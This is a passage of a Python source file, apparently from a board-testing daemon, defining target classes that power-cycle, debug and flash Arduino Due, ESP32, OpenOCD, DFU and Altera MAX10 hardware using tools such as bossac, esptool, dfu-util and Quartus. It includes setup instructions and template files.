bossac_cmd = \"bossac\"\n\n def __init__(self, _id, serial_port,\n power_control = None,\n bossac_cmd = \"bossac\"):\n \"\"\"Test target for a target flashable with the bossac tool (mostly\n Arduino Due)\n\n *Requirements*\n\n - Needs a connection to the USB programming port\n\n - Uses the bossac utility built on the *arduino* branch from\n https://github.com/shumatech/BOSSA/tree/arduino; requires it\n to be installed in the path ``bossac_cmd`` (defaults to sytem\n path). Supports ``kernel{,-arm}`` images::\n\n $ git clone https://github.com/shumatech/BOSSA.git bossac.git\n $ cd bossac.git\n $ make -k\n $ sudo install -o root -g root bin/bossac /usr/local/bin\n\n - TTY devices need to be properly configured permission wise for\n bossac and serial console to work; for such, choose a Unix group\n which can get access to said devices and add udev rules such as::\n\n # Arduino2 boards: allow reading USB descriptors\n SUBSYSTEM==\"usb\", ATTR{idVendor}==\"2a03\", ATTR{idProduct}==\"003d\", \\\n GROUP=\"GROUPNAME\", MODE = \"660\"\n\n # Arduino2 boards: allow reading serial port\n SUBSYSTEM == \"tty\", ENV{ID_SERIAL_SHORT} == \"SERIALNUMBER\", \\\n GROUP = \"GROUPNAME\", MODE = \"0660\", \\\n SYMLINK += \"tty-TARGETNAME\"\n\n The theory of operation is quite simple. According to\n https://www.arduino.cc/en/Guide/ArduinoDue#toc4, the Due will\n erase the flash if you open the programming port at 1200bps\n and then start a reset process and launch the flash when you\n open the port at 115200. This is not so clear in the URL\n above, but this is what expermientation found.\n\n So for flashing, we'll take over the console, set the serial\n port to 1200bps, wait a wee bit and then call bossac.\n\n We need power control to fully reset the Arduino Due when it\n gets in a tight spot (and to save power when not using it).\n There is no reset, we just power cycle -- found no way to do a\n reset in SW without erasing the flash.\n\n :param str _id: name identifying the target\n\n :param str serial_port: File name of the device node\n representing the serial port this device is connected to.\n\n :param ttbl.tt_power_control_impl power_control: power controller\n (if any)\n\n :param bossac_cmd: Path and file where to find the `bossac`\n utility.\n\n \"\"\"\n self.serial_port = serial_port\n self.serial_port_basename = os.path.basename(serial_port)\n #:param power_url: http://USER:PASSWORD@HOST:PORT/OUTLETNUMBER\n ttbl.test_target.__init__(self, _id)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.cm_serial.cm_serial.__init__(\n self, self.state_dir,\n [\n \"pc\",\n { 'port': serial_port, 'baudrate': 115200 }\n ])\n self.bossac_cmd = bossac_cmd\n\n def image_do_set(self, image_type, image_name):\n \"\"\"Just validates the image types are ok. The flashing happens in\n images_do_set().\n\n :param str image_type: Type of the image supported\n :param str image_name: Name of image file in the daemon\n storage space for the user\n :raises: Any exception on failure\n\n \"\"\"\n if image_type != \"kernel\" and image_type != \"kernel-arm\":\n raise self.unsupported_image_e(\"%s: image type not supported \"\n \"(only kernel or kernel-arm)\"\n % image_type)\n self.power_on(self.owner_get())\n with self.console_takeover():\n # erase the flash by opening the serial port at 1200bps\n self.log.info(\"Erasing the flash\")\n eo = serial.Serial(port = self.serial_port, baudrate = 1200)\n time.sleep(0.25)\n eo.close()\n self.log.debug(\"Erased the flash\")\n # now write it\n cmdline = [ self.bossac_cmd,\n \"-p\", self.serial_port_basename,\n \"-e\", # Erase current\n \"-w\",\t# Write a new one\n \"-v\",\t# Verify,\n \"-b\",\t# Boot from Flash\n image_name ]\n self.log.info(\"flashing image with: %s\" % \" \".join(cmdline))\n so = commonl.logfile_open(\"bossac\", type(self), True, 0)\n s = subprocess.Popen(\n cmdline, stdin = None, cwd = \"/tmp\",\n stdout = so, stderr = subprocess.STDOUT)\n self.log.info(\"running %s\" % (\" \".join(cmdline)))\n r = s.wait()\n del s\n\n so.seek(0)\n # Say what happened\n if r != 0:\n self.log.error(\"flashing failed\")\n m = \"\"\n with codecs.open(so.name, \"r\", encoding = 'utf-8') as so_r:\n for line in so_r:\n line = line.decode('utf-8').strip()\n self.log.error(\"flashing output: \" + line)\n m += \"flashing output: \" + line + \"\\n\"\n raise Exception(\"Flashing failed\\n\" + m)\n # Check the log, if it does not say \"Verify succesful\", it didn't work\n with codecs.open(so.name, \"r\", encoding = 'utf-8') as so_r:\n m = \"\"\n for line in so_r:\n line = line.decode('utf-8').strip()\n if line.endswith(\"Verify successful\"):\n break\n m += \"flashing output: \" + line + \"\\n\"\n else:\n raise Exception(\n \"Flashing failed (can't find 'Verify syccessful')\\n\" + m)\n self.log.info(\"flashing succeeded\")\n with codecs.open(so.name, \"r\", encoding = 'utf-8') as so_r:\n for line in so_r:\n line = line.strip()\n self.log.debug(\"flashing: \" + line)\n\n def images_do_set(self, images):\n pass\n\n\nclass tt_esp32(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial,\n ttbl.test_target_images_mixin):\n\n esptool_path = \"__unconfigured__tt_esp32.esptool_path__\"\n\n def __init__(self, _id, serial_number,\n power_control, serial_port):\n \"\"\"\\\n Test target ESP32 Tensilica based MCUs that use the ESP-IDF framework\n\n :param str _id: name identifying the target\n\n :param str serial_number: Unique USB serial number of the device (can\n be updated with http://cp210x-program.sourceforge.net/)\n\n :param power_control: Power control implementation or rail\n (:class:`ttbl.tt_power_control_impl` or list of such)\n\n :param str serial_port: Device name of the serial port where\n the console will be found. This can be set with udev to be a\n constant name.\n\n The base code will convert the *ELF* image to the required\n *bin* image using the ``esptool.py`` script. Then it will\n flash it via the serial port.\n\n *Requirements*\n\n - The ESP-IDK framework, of which ``esptool.py`` is used to\n flash the target; to install::\n\n $ cd /opt\n $ git clone --recursive https://github.com/espressif/esp-idf.git\n\n (note the ``--recursive``!! it is needed so all the\n submodules are picked up)\n\n configure path to it globally by setting\n :attr:`esptool_path` in a /etc/ttbd-production/conf_*.py file:\n\n .. code-block:: python\n\n import ttbl.tt\n ttbl.tt.tt_esp32.esptool_path = \"/opt/esp-idf/components/esptool_py/esptool/esptool.py\"\n\n Note you will also most likely need this in the client to\n compile code for the board.\n\n - Permissions to use USB devices in */dev/bus/usb* are needed;\n *ttbd* usually roots with group *root*, which shall be\n enough.\n\n - Needs power control for proper operation; FIXME: pending to\n make it operate without power control, using ``esptool.py``.\n \"\"\"\n assert isinstance(_id, basestring)\n assert isinstance(serial_number, basestring)\n assert isinstance(power_control, ttbl.tt_power_control_impl) \\\n or isinstance(power_control, list)\n\n self.serial_number = serial_number\n\n ttbl.test_target.__init__(self, _id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.test_target_images_mixin.__init__(self)\n self.serial_port = serial_port\n ttbl.cm_serial.cm_serial.__init__(\n self, self.state_dir,\n [\n \"pc\",\n { 'port': serial_port, 'baudrate': 115200 }\n ])\n\n def images_do_set(self, images):\n # We implement image_do_set(), as there is only one image to set\n pass\n\n\n def image_do_set(self, image_type, image_name):\n \"\"\"Just validates the image types are ok. The flashing happens in\n images_do_set().\n\n :param str image_type: Type of the image supported\n :param str image_name: Name of image file in the daemon\n storage space for the user\n :raises: Any exception on failure\n\n \"\"\"\n cmdline_convert = [\n self.esptool_path,\n \"--chip\", \"esp32\",\n \"elf2image\",\n ]\n cmdline_flash = [\n self.esptool_path,\n \"--chip\", \"esp32\",\n \"--port\", self.serial_port,\n \"--baud\", \"921600\",\n \"--before\", \"default_reset\",\n \"write_flash\", \"-u\",\n \"--flash_mode\", \"dio\",\n \"--flash_freq\", \"40m\",\n \"--flash_size\", \"detect\",\n \"0x1000\",\n ]\n\n if image_type == \"kernel\":\n image_type = \"kernel-xternsa\"\n if not image_type.startswith(\"kernel-\"):\n raise RuntimeError(\n \"Unknown image type '%s' (valid: kernel-{%s})\"\n % (image_type, \",\".join(self.tags['bsps'].keys())))\n image_name_bin = image_name + \".bin\"\n try:\n cmdline = cmdline_convert + [ image_name,\n \"--output\", image_name_bin ]\n self.log.info(\"converting with %s\" % \" \".join(cmdline))\n s = subprocess.check_output(cmdline, cwd = \"/tmp\",\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"converting image with %s failed: (%d) %s\"\n % (\" \".join(cmdline), e.returncode, e.output))\n raise\n\n self._power_cycle_do()\n with self.console_takeover():\t# give up the serial port\n try:\n cmdline = cmdline_flash + [ image_name_bin ]\n self.log.info(\"flashing with %s\" % \" \".join(cmdline))\n s = subprocess.check_output(cmdline, cwd = \"/tmp\",\n stderr = subprocess.STDOUT)\n self.log.info(\"flashed with %s: %s\" % (\" \".join(cmdline), s))\n except subprocess.CalledProcessError as e:\n self.log.error(\"flashing with %s failed: (%d) %s\"\n % (\" \".join(cmdline), e.returncode, e.output))\n raise\n self._power_off_do()\n self.log.info(\"flashing succeeded\")\n\n\nclass tt_flasher(\n ttbl.test_target,\n ttbl.test_target_images_mixin,\n ttbl.tt_power_control_mixin,\n ttbl.tt_debug_mixin,\n ttbl.cm_serial.cm_serial):\n\n class error(RuntimeError):\n pass\n\n def __init__(self, _id, serial_ports,\n flasher, power_control):\n \"\"\"Test target flashable, power switchable with debuggin\n\n Any target which supports the :class:`ttbl.flasher.flasher_c`\n interface can be used, mostly OpenOCD targets.\n\n How we use this, is for example:\n\n >>> flasher_openocd = ttbl.flasher.openocd_c(\"frdm_k64f\", FRDM_SERIAL,\n >>> openocd10_path, openocd10_scripts)\n >>> ttbl.config.target_add(\n >>> ttbl.tt.tt_flasher(\n >>> NAME,\n >>> serial_ports = [\n >>> \"pc\",\n >>> dict(port = \"/dev/tty-NAME\", baudrate = 115200)\n >>> ],\n >>> flasher = flasher_obj,\n >>> power_control = [\n >>> ttbl.pc_ykush.ykush(YKUSH_SERIAL, YKUSH_PORT)\n >>> # delay until device comes up\n >>> ttbl.pc.delay_til_usb_device(FRDM_SERIAL),\n >>> ttbl.cm_serial.pc(),\t# Connect serial ports\n >>> flasher_openocd, # Start / stop OpenOCD\n >>> ]\n >>> ),\n >>> tags = {\n >>> 'bsp_models' : { 'arm': None },\n >>> 'bsps' : {\n >>> \"arm\": dict(board = \"frdm_k64f\", kernelname = 'zephyr.bin',\n >>> kernel = [ \"micro\", \"nano\" ],\n >>> console = \"\", quark_se_stub = \"no\"),\n >>> },\n >>> 'slow_flash_factor': 5,\t# Flash verification slow\n >>> 'flash_verify': 'False', # Or disable it ...\n >>> },\n >>> target_type = \"frdm_k64f\")\n\n .. note: the power for this target is a normal power control\n implementation, HOWEVER, the power rail also contains\n the OpenOCD flasher to start/stop the daemon once the\n board is powered up.\n\n :param str _id: target name\n\n :param serial_ports: list of serial port dictionaries,\n specified as for :func:`serial.serial_for_url` with a couple\n of extras as specified in :class:`ttbl.cm_serial`.\n\n :param ttbl.flasher.flasher_c flasher: flashing object that\n provides access to deploy images and debug control\n\n :param power_control: an instance of an implementation\n of the power_control_mixin used to implement power control for\n the target. Use ttbl.pc.manual() for manual power control that\n requires user interaction.\n\n \"\"\"\n ttbl.test_target.__init__(self, _id)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.tt_debug_mixin.__init__(self)\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, serial_ports)\n self.flasher = flasher\n self.flasher.test_target_link(self)\n self.power_on_post_fns.append(self.power_on_do_post)\n self.power_off_pre_fns.append(self.power_off_do_pre)\n\n # Debugging interface\n #\n # We don't do much other than resuming the target if we stop\n # debugging\n def debug_do_start(self, tt_ignored):\n pass\n\n def debug_do_halt(self, _):\n if self.flasher:\n self.flasher.target_halt(for_what = \"debug_halt\")\n\n def debug_do_reset(self, _):\n if self.flasher:\n self.flasher.target_reset_halt(for_what = \"debug_reset\")\n\n def debug_do_reset_halt(self, _):\n if self.flasher:\n self.flasher.target_reset_halt(for_what = \"debug_reset_halt\")\n\n def debug_do_resume(self, _):\n if self.flasher:\n self.flasher.target_resume(for_what = \"debug_resume\")\n\n def debug_do_stop(self, _):\n if self.flasher:\n self.flasher.target_resume()\n\n def debug_do_info(self, _):\n # FIXME: self.flasher should be providing this information, this\n # is breaking segmentation\n count = 2 # port #0 is for telnet, #1 for TCL\n tcp_port_base_s = self.fsdb.get(\"openocd.port\")\n if tcp_port_base_s == None:\n return \"Debugging information not available, power on?\"\n tcp_port_base = int(tcp_port_base_s)\n s = \"OpenOCD telnet server: %s %d\\n\" \\\n % (socket.getfqdn('0.0.0.0'), tcp_port_base)\n for target in self.flasher.board['targets']:\n s += \"GDB server: %s: tcp:%s:%d\\n\" % (target,\n socket.getfqdn('0.0.0.0'),\n tcp_port_base + count)\n count +=1\n if self.fsdb.get('powered') != None:\n s += \"Debugging available as target is ON\"\n else:\n s += \"Debugging not available as target is OFF\"\n return s\n\n def debug_do_openocd(self, _, command):\n return self.flasher.openocd_cmd(command)\n\n # Wrap actual reset with retries\n def target_reset_halt(self, for_what = \"\"):\n tries = 1\n tries_max = 2\n # FIXME: current limitation, can't access the tags from the\n # constructor as the ones we add in target_add() aren't there\n # yet.\n wait = \\\n float(self.tags.get('hard_recover_rest_time', 2))\n while tries <= tries_max:\n # The Arduino101 get's so stuck sometimes\n try:\n self.flasher.target_reset_halt(for_what)\n break\n except self.flasher.error:\n pass\n try_s = \"%d/%d\" % (tries, tries_max)\n time.sleep(2)\n try:\n self.flasher.target_reset(\"[recover reset #1 %s] \" % try_s\n + for_what)\n except self.flasher.error:\n pass\n try:\n self.flasher.target_reset_halt(\"[retry %s] \" % try_s\n + for_what)\n break\n except self.flasher.error:\n pass\n # In some targets, this fails because maybe we just\n # power-cycled and the JTAG said it was ready but it\n # is really not ready...when that happens, just\n # power-cycle again.\n # well, that didn't work either; bring the big guns,\n # power cycle it and try the whole thing again\n wait_s = (1 + 2.0 * tries/tries_max) * wait\n self.log.info(\"Failed to reset/halt, power-cycle (%.2fs) \"\n \"and retrying (try %d/%d)\"\n % (wait_s, tries, tries_max))\n self.power_cycle(self.owner_get(), wait_s)\n tries += 1\n else:\n # FIXME: pass the exception we get or the log or something\n raise self.error(\"Can't reset/halt the target\")\n\n def target_reset(self, for_what = \"\"):\n tries = 1\n tries_max = 5\n # FIXME: current limitation, can't access the tags from the\n # constructor as the ones we add in target_add() aren't there\n # yet.\n wait = \\\n float(self.tags.get('hard_recover_rest_time', 10))\n while tries <= tries_max:\n # The Arduino101 get's so stuck sometimes\n try:\n self.flasher.target_reset(for_what)\n break\n except self.flasher.error:\n pass\n # Try again\n try:\n self.flasher.target_reset(for_what)\n break\n except self.flasher.error:\n pass\n # Bring the big guns, power cycle it\n if wait != None:\n wait_s = tries * wait\n self.log.info(\"Failed to reset/run, power-cycle (%.2fs) \"\n \"and retrying (try %d/%d)\"\n % (wait_s, tries, tries_max))\n self.power_cycle(self.owner_get(), wait_s)\n tries += 1\n else:\n # FIXME: pass the exception we get or the log or something\n raise self.error(\"Can't reset/run the target\")\n\n # Power interface\n #\n # Fire up the flasher when we power the target up, so it can\n # access the JTAG\n\n\n def power_on_do_post(self):\n self.flasher.start()\n\n def power_off_do_pre(self):\n self.flasher.stop()\n\n def reset_do(self, _):\n # We halt first so we can stop recording from the serial ports\n # and then restart wihout getting any trash; we use reset_halt\n # because it is a single command for all targets (halt needs\n # to select each target).\n self.flasher.target_reset_halt()\n self.consoles_reset()\n # When we reset, if we are debugging we need to halt the target as\n # soon as it starts. Otherwise, we reset it normally. These\n # are atomic (they act on all the targets at the same time..in\n # theory)\n if self.fsdb.get(\"debug\") != None:\n self.flasher.target_reset_halt()\n else:\n self.flasher.target_reset()\n\n # Flashing interface -- quite simple, we need the target on and\n # then just flash the image in.\n def image_do_set(self, image_type, image_name):\n pass\n\n def images_do_set(self, images):\n # FIXME: current limitation, can't access the tags from the\n # constructor as the ones we add in target_add() aren't there\n # yet.\n wait = \\\n float(self.tags.get('hard_recover_rest_time', 10))\n if self.fsdb.get(\"disable_power_cycle_before_flash\") != 'True':\n # Make sure the target is really fresh before flashing it\n try:\n # See the documentation for this on class flasher_c\n # for why we have to do it.\n self.flasher.hack_reset_after_power_on = True\n self.power_cycle(self.owner_get(), wait = wait)\n finally:\n self.flasher.hack_reset_after_power_on = False\n self.log.info(\"sleeping 2s after power cycle\")\n # HACK: For whatever the reason, we need to sleep before\n # resetting/halt, seems some of the targets are not ready\n # inmediately after\n time.sleep(2)\n self.target_reset_halt(for_what = \"for image flashing\")\n timeout_factor = self.tags.get('slow_flash_factor', 1)\n verify = self.tags.get('flash_verify', 'True') == 'True'\n # FIXME: replace this check for verifying which image types\n # the flasher supports\n for t, n in images.iteritems():\n if t == \"kernel-x86\":\n it = \"x86\"\n elif t == \"kernel\":\n it = \"x86\"\n elif t == \"kernel-arc\":\n it = \"arc\"\n elif t == \"kernel-arm\":\n it = \"arm\"\n elif t == \"rom\":\n it = \"rom\"\n elif t == \"bootloader\":\n it = \"bootloader\"\n else:\n raise self.unsupported_image_e(\n \"%s: Unknown image type (expected \"\n \"kernel|kernel-(x86,arc,arm), rom)\"\n % t)\n try:\n self.flasher.image_write(it, n, timeout_factor, verify)\n except ValueError as e:\n self.log.exception(\"flashing got exception: %s\", e)\n raise self.unsupported_image_e(e.message)\n\nclass tt_dfu(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial,\n ttbl.test_target_images_mixin):\n\n def __init__(self, _id, serial_number,\n power_control, power_control_board,\n serial_ports = None):\n \"\"\"Test target for a flashable with DFU Utils\n\n *Requirements*\n\n - Needs a connection to the USB port that exposes a DFU\n interface upon boot\n\n - Uses the dfu-utils utility, available for most (if not all)\n Linux distributions\n\n - Permissions to use USB devices in */dev/bus/usb* are needed;\n *ttbd* usually roots with group *root*, which shall be\n enough.\n\n - Needs power control for proper operation\n\n :param str _id: name identifying the target\n\n :param power_control: Power control implementation or rail\n (:class:`ttbl.tt_power_control_impl` or list of such)\n\n :param ttbl.tt_power_control_impl power_control: power controller\n *just* for the board--this is the component in the power\n control rail that controls the board only (versus other\n parts such as serial ports or pseudo-power-controllers that\n wait for the USB device to pop up.\n\n Note the tags to the target must include, on each supported\n BSP, a tag named *dfu_interface_name* listing the name of the\n *altsetting* of the DFU interface to which the image for said\n BSP needs to be flashed.\n\n This can be found, when the device exposes the DFU interfaces\n with the *lsusb -v* command; for example, for a tinyTILE\n (output summarized for clarity)::\n\n $ lsusb -v\n ...\n Bus 002 Device 110: ID 8087:0aba Intel Corp.\n Device Descriptor:\n bLength 18\n bDescriptorType 1\n ...\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update...\n iInterface 4 x86_rom\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update...\n iInterface 5 x86_boot\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 6 x86_app\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 7 config\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 8 panic\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 9 events\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 10 logs\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 11 sensor_core\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 12 ble_core\n\n In this case, the three cores available are x86 (x86_app), arc\n (sensor_core) and ARM (ble_core).\n\n *Example*\n\n A Tiny Tile can be connected, without exposing a serial console:\n\n >>> pc_board = ttbl.pc_ykush.ykush(\"YK22909\", 1)\n >>>\n >>> ttbl.config.target_add(\n >>> tt_dfu(\"ti-01\",\n >>> serial_number = \"5614010001031629\",\n >>> power_control = [\n >>> pc_board,\n >>> ttbl.pc.delay_til_usb_device(\"5614010001031629\"),\n >>> ],\n >>> power_control_board = pc_board),\n >>> tags = {\n >>> 'bsp_models': { 'x86+arc': ['x86', 'arc'], 'x86': None, 'arc': None},\n >>> 'bsps' : {\n >>> \"x86\": dict(zephyr_board = \"tinytile\",\n >>> zephyr_kernelname = 'zephyr.bin',\n >>> dfu_interface_name = \"x86_app\",\n >>> console = \"\"),\n >>> \"arm\": dict(zephyr_board = \"arduino_101_ble\",\n >>> zephyr_kernelname = 'zephyr.bin',\n >>> dfu_interface_name = \"ble_core\",\n >>> console = \"\"),\n >>> \"arc\": dict(zephyr_board = \"arduino_101_sss\",\n >>> zephyr_kernelname = 'zephyr.bin',\n >>> dfu_interface_name = 'sensor_core',\n >>> console = \"\")\n >>> },\n >>>\n >>> },\n >>> target_type = \"tile\"\n >>> )\n\n \"\"\"\n assert isinstance(_id, basestring)\n assert isinstance(serial_number, basestring)\n assert isinstance(power_control, ttbl.tt_power_control_impl) \\\n or isinstance(power_control, list)\n\n self.serial_number = serial_number\n self.pc_board = power_control_board\n self.pc_usb = ttbl.pc.delay_til_usb_device(serial_number)\n\n ttbl.test_target.__init__(self, _id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, serial_ports)\n\n def images_do_set(self, images):\n \"\"\"Just validates the image types are ok. The flashing happens in\n images_do_set().\n\n :param str image_type: Type of the image supported\n :param str image_name: Name of image file in the daemon\n storage space for the user\n :raises: Any exception on failure\n\n \"\"\"\n\n # Power cycle the board so it goes into DFU mode; it then\n # stays there for five seconds\n self.pc_board.power_cycle_raw(self, 5)\n self.pc_usb.power_on_do(self)\n\n cmdline = [\n \"/usr/bin/dfu-util\",\n \"-S\", self.serial_number\n ]\n for image_type, image_name in images.iteritems():\n if image_type == \"kernel\":\n image_type = \"kernel-x86\"\n if not image_type.startswith(\"kernel-\"):\n raise RuntimeError(\n \"Unknown image type '%s' (valid: kernel-{%s})\"\n % (image_type, \",\".join(self.tags['bsps'].keys())))\n bsp = image_type[len(\"kernel-\"):]\n tags_bsp = self.tags.get('bsps', {}).get(bsp, None)\n if tags_bsp == None:\n raise RuntimeError(\n \"Unknown BSP %s from image type '%s' (valid: %s)\"\n % (bsp, image_type, \" \".join(self.tags['bsps'].keys())))\n dfu_if_name = tags_bsp.get('dfu_interface_name', None)\n if dfu_if_name == None:\n raise RuntimeError(\n \"Misconfigured target: image type %s (BSP %s) has \"\n \"no 'dfu_interface_name' key to indicate which DFU \"\n \"interface shall it flash\"\n % (image_type, bsp))\n # now write it\n cmdline += [\n \"-a\", dfu_if_name,\n \"-D\", image_name,\n ]\n try:\n self.log.info(\"flashing with %s\" % (\" \".join(cmdline)))\n s = subprocess.check_output(cmdline, cwd = \"/tmp\",\n stderr = subprocess.STDOUT)\n self.log.info(\"flashed with %s: %s\" % (\" \".join(cmdline), s))\n except subprocess.CalledProcessError as e:\n self.log.error(\"flashing with %s failed: (%d) %s\" %\n (\" \".join(cmdline), e.returncode, e.output))\n raise\n self.log.info(\"flashing succeeded\")\n self.pc_board.power_off_do(self)\n\n def image_do_set(self, t, n):\n pass\n\nclass tt_max10(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial,\n ttbl.test_target_images_mixin):\n \"\"\"\n Test target for an Altera MAX10\n\n This allows to flash images to an Altera MAX10, using the Quartus\n tools, freely downloadable from http://dl.altera.com.\n\n Exports the following interfaces:\n\n - power control (using any AC power switch, such as the\n :class:`Digital Web Power Switch 7 <ttbl.pc.dlwps7>`)\n - serial console\n - image (in hex format) flashing (using the Quartus Prime tools\n package)\n\n Multiple instances at the same time are supported; however, due to\n the JTAG interface not exporting a serial number, addressing has\n to be done by USB path, which is risky (as it will change when the\n cable is plugged to another port or might be enumerated in a\n different number).\n\n Note that:\n\n - when flashing LED1 blinks green/blue\n\n - the blue power switch must be pressed, to ensure the board is\n *ON* when we switch the AC power to the power brick on\n\n - SW2 DIP bank on the back of the board has to be all OFF (down)\n except for 3, that has to be ON (this comes from the Zephyr\n Altera MAX10 configuration)\n\n - J7 (at the front of the board, next to the coaxial connectors)\n has to be open\n\n Pending:\n\n - CPU design hardcoded to use Zephyr's -- it shall be possible to\n flash it\n \"\"\"\n\n #: Path where the Quartus Programmer binaries have been installed\n #:\n #: 1. Download Quartus Prime Programmer and Tools from\n #: http://dl.altera.com/17.1/?edition=lite&platform=linux&download_manager=direct\n #: 2. Install to e.g `/opt/intelFPGA/17.1/qprogrammer/bin`.\n #: 3. Configure in /etc/ttbd-production/conf_00_max10.py::\n #:\n #: .. code-block: python\n #:\n #: import ttbl.tt\n #: ttbl.tt.tt_max10.quartus_path = \"/opt/intelFPGA/17.1/qprogrammer/bin\"\n quartus_path = \"__unconfigured__tt_max10.quartus_path__\"\n\n #: Path to where the NIOS Zephyr CPU image has been installed\n #:\n #: 1. Download the CPU image to `/var/lib/ttbd`::\n #:\n #: $ wget -O /var/lib/ttbd/ghrd_10m50da.sof \\\n #: https://github.com/zephyrproject-rtos/zephyr/raw/master/arch/nios2/soc/nios2f-zephyr/cpu/ghrd_10m50da.sof\n #:\n #: 3. Configure in /etc/ttbd-production/conf_00_max10.py:\n #:\n #: .. code-block: python\n #:\n #: import ttbl.tt\n #: ttbl.tt.tt_max10.input_sof = \"/var/lib/ttbd/ghrd_10m50da.sof\"\n input_sof = \"__unconfigured__tt_max10.input_sof__\"\n\n def __init__(self, _id, device_id,\n power_control, serial_port = None):\n assert isinstance(_id, basestring)\n assert isinstance(device_id, basestring)\n assert isinstance(power_control, ttbl.tt_power_control_impl) \\\n or isinstance(power_control, list)\n\n self.device_id = device_id\n\n ttbl.test_target.__init__(self, _id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.test_target_images_mixin.__init__(self)\n self.serial_port = serial_port\n if serial_port:\n ttbl.cm_serial.cm_serial.__init__(\n self, self.state_dir,\n [\n \"pc\",\n { 'port': serial_port, 'baudrate': 115200 }\n ])\n else:\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, [])\n\n quartus_cpf_template = \"\"\"\\\n<?xml version=\"1.0\" encoding=\"US-ASCII\" standalone=\"yes\"?>\n<cof>\n\t<output_filename>${OUTPUT_FILENAME}</output_filename>\n\t<n_pages>1</n_pages>\n\t<width>1</width>\n\t<mode>14</mode>\n\t<sof_data>\n\t\t<user_name>Page_0</user_name>\n\t\t<page_flags>1</page_flags>\n\t\t<bit0>\n\t\t\t<sof_filename>${SOF_FILENAME}<compress_bitstream>1</compress_bitstream></sof_filename>\n\t\t</bit0>\n\t</sof_data>\n\t<version>10</version>\n\t<create_cvp_file>0</create_cvp_file>\n\t<create_hps_iocsr>0</create_hps_iocsr>\n\t<auto_create_rpd>0</auto_create_rpd>\n\t<rpd_little_endian>1</rpd_little_endian>\n\t<options>\n\t\t<map_file>1</map_file>\n\t</options>\n\t<MAX10_device_options>\n\t\t<por>0</por>\n\t\t<io_pullup>1</io_pullup>\n\t\t<config_from_cfm0_only>0</config_from_cfm0_only>\n\t\t<isp_source>0</isp_source>\n\t\t<verify_protect>0</verify_protect>\n\t\t<epof>0</epof>\n\t\t<ufm_source>2</ufm_source>\n\t\t<ufm_filepath>${KERNEL_FILENAME}</ufm_filepath>\n\t</MAX10_device_options>\n\t<advanced_options>\n\t\t<ignore_epcs_id_check>2</ignore_epcs_id_check>\n\t\t<ignore_condone_check>2</ignore_condone_check>\n\t\t<plc_adjustment>0</plc_adjustment>\n\t\t<post_chain_bitstream_pad_bytes>-1</post_chain_bitstream_pad_bytes>\n\t\t<post_device_bitstream_pad_bytes>-1</post_device_bitstream_pad_bytes>\n\t\t<bitslice_pre_padding>1</bitslice_pre_padding>\n\t</advanced_options>\n</cof>\n\"\"\"\n\n # XXX Do we care about FileRevision, DefaultMfr, PartName? Do they need\n # to be parameters? So far seems to work across 2 different boards, leave\n # this alone for now.\n quartus_pgm_template = \"\"\"\\\n/* Quartus Prime Version 16.0.0 Build 211 04/27/2016 SJ Lite Edition */\nJedecChain;\n\tFileRevision(JESD32A);\n\tDefaultMfr(6E);\n\n\tP ActionCode(Cfg)\n\t\tDevice PartName(10M50DAF484ES) Path(\"${POF_DIR}/\") File(\"${POF_FILE}\") MfrSpec(OpMask(1));\n\nChainEnd;\n\nAlteraBegin;\n\tChainType(JTAG);\nAlteraEnd;\"\"\"\n\n def _create_pof(self, output_pof, input_sof, kernel_hex):\n t = string.Template(self.quartus_cpf_template)\n input_sof = os.path.abspath(input_sof)\n kernel_hex = os.path.abspath(kernel_hex)\n # These tools are very stupid and freak out if the desired filename\n # extensions are used. The kernel image must have extension .hex\n with tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".cof\") as temp_xml:\n xml = t.substitute(SOF_FILENAME = input_sof,\n OUTPUT_FILENAME = output_pof.name,\n KERNEL_FILENAME = kernel_hex)\n temp_xml.write(xml)\n temp_xml.flush()\n try:\n cmd = [\n os.path.join(self.quartus_path, \"quartus_cpf\"),\n \"-c\", temp_xml.name\n ]\n subprocess.check_output(cmd)\n except OSError as e:\n raise RuntimeError(\"Failed to create POF file w/ %s: %s\"\n % (\" \".join(cmd), e))\n except subprocess.CalledProcessError as cpe:\n raise RuntimeError(\"Failed to create POF file: %s\"\n % cpe.output.decode(\"UTF-8\"))\n return output_pof\n\n\n def images_do_set(self, images):\n # We implement image_do_set(), as there is only one image to set\n pass\n\n # FIXME: limitation: SOF image is fixed, should be possible to\n # upload it and default to built-in? Problem is we need to fixup\n # the build instructions so they understand they need to upload\n # the SOF too\n # FIXME: also, the SOF is kinda big, 3M\n def image_do_set(self, image_type, image_name):\n if image_type == \"kernel\":\n image_type = \"kernel-max10\"\n if not 